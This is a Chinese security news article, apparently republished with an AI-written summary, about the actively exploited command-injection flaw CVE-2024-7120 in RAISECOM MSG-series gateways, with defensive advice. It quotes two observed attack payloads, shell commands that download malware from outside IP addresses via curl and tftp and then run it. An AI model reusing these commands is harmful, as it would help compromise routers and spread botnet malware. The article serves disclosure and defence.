安全客周刊 2024年09月27日
RAISECOM 网关中的严重漏洞被积极利用,数千人面临远程攻击
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

近期,RAISECOM 网关设备中发现了一个名为 CVE-2024-7120 的严重漏洞,该漏洞允许远程攻击者执行任意命令,可能导致数据泄露和系统受损。该漏洞影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。安全研究人员已证实该漏洞易于利用,并发布了概念验证代码。威胁行为者正在积极利用该漏洞,自 9 月初以来,攻击活动有所增加,并在 9 月 12 日至 13 日达到高峰。

😠 **漏洞细节**:该漏洞存在于 Web 界面的 list_base_config.php 脚本中,允许远程攻击者在受影响的设备上执行任意命令,可能导致未经授权的访问、数据泄露和系统受损。 该漏洞被跟踪为 CVE-2024-7120,关键 CVSS 评分为 9.8,表明其严重程度很高。 该漏洞影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。 安全研究人员已证实该漏洞易于利用,并发布了概念验证代码,这意味着攻击者可以轻松地利用该漏洞进行攻击。

💀 **攻击方式**:安全专家 Johannes B. Ullrich 博士确定了攻击者使用的两种不同的有效载荷。这些有效载荷旨在下载和执行恶意软件,表明攻击者正在进行常规僵尸网络扫描和破坏易受攻击的路由器。 第一种有效载荷使用 curl 命令从远程服务器下载恶意软件,然后执行该软件。 第二种有效载荷使用 tftp 命令从远程服务器下载恶意软件,然后执行该软件。

🛡️ **防御措施**:由于 RAISECOM 尚未发布补丁,企业需要立即采取措施来降低风险。 限制对设备 Web 界面的访问,仅允许受信任的网络和授权人员访问。 在 Web 界面上实施严格的输入验证和清理程序,以防止恶意代码注入。 采用强大的网络监控和入侵检测系统来识别和响应任何可疑活动。 定期更新设备固件和软件,以确保获得最新的安全补丁。

🚀 **建议**:企业应立即采取措施来保护其 RAISECOM 网关设备,以防止遭受攻击。建议企业参考安全专家的建议,采取必要措施来降低风险。

🧭 **未来方向**:RAISECOM 需要尽快发布安全补丁来修复该漏洞。企业也应关注安全研究人员发布的最新信息,并及时采取措施来应对新的安全威胁。

🎯 **结论**:CVE-2024-7120 漏洞对企业安全构成重大威胁,企业应立即采取措施来保护其 RAISECOM 网关设备。

🚨 **提醒**:请及时更新设备固件和软件,并注意安全研究人员发布的最新信息。

💡 **思考**:如何更好地保护企业网络安全?

🔐 **安全意识**:提高安全意识,识别和防范潜在的网络安全威胁。

发布时间 : 2024-09-27 14:29:31

在 RAISECOM 网关设备中新发现并积极利用的漏洞对企业安全构成重大威胁。该漏洞被跟踪为 CVE-2024-7120,关键 CVSS 评分为 9.8,允许远程攻击者在受影响的设备上执行任意命令,可能导致未经授权的访问、数据泄露和系统受损。

命令注入漏洞存在于 Web 界面的 list_base_config.php 脚本中,影响运行软件版本 3.90 的 RAISECOM Gateway 型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。安全研究人员已经证实了它很容易被利用,并且概念验证代码随时可用。

威胁行为者正在积极利用这一漏洞,自 9 月初以来就观察到了攻击,在 9 月 12 日至 13 日左右达到顶峰。

图片来源: Johannes B. Ullrich

安全专家、研究院长 Johannes B. Ullrich 博士确定了攻击中使用的两种不同的有效载荷。这些旨在下载和执行恶意软件的有效负载显示了常规僵尸网络扫描和破坏易受攻击的路由器的证据。

第一个有效载荷

 cd /tmprm -rf tplinkcurl http://45.202.35.94/tplink --output tplinkchmod 777 tplink./tplink

第二个负载(使用 TFTP 而不是 HTTP):

 cd /tmptftp -g -r ppc 141.98.11.136 69chmod 777 ppc./ppc raisee

虽然 RAISECOM 尚未发布补丁,但立即采取行动对于降低风险至关重要:

    限制访问:将对设备 Web 界面的访问限制为仅受信任的网络和授权人员。输入验证:在 Web 界面上实施严格的输入验证和清理程序,以防止恶意代码注入。网络监控:采用强大的网络监控和入侵检测系统来识别和响应任何可疑活动。

商务合作,文章发布请联系 anquanke@360.cn

安全客

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

RAISECOM 网关漏洞 CVE-2024-7120 网络安全 企业安全
相关文章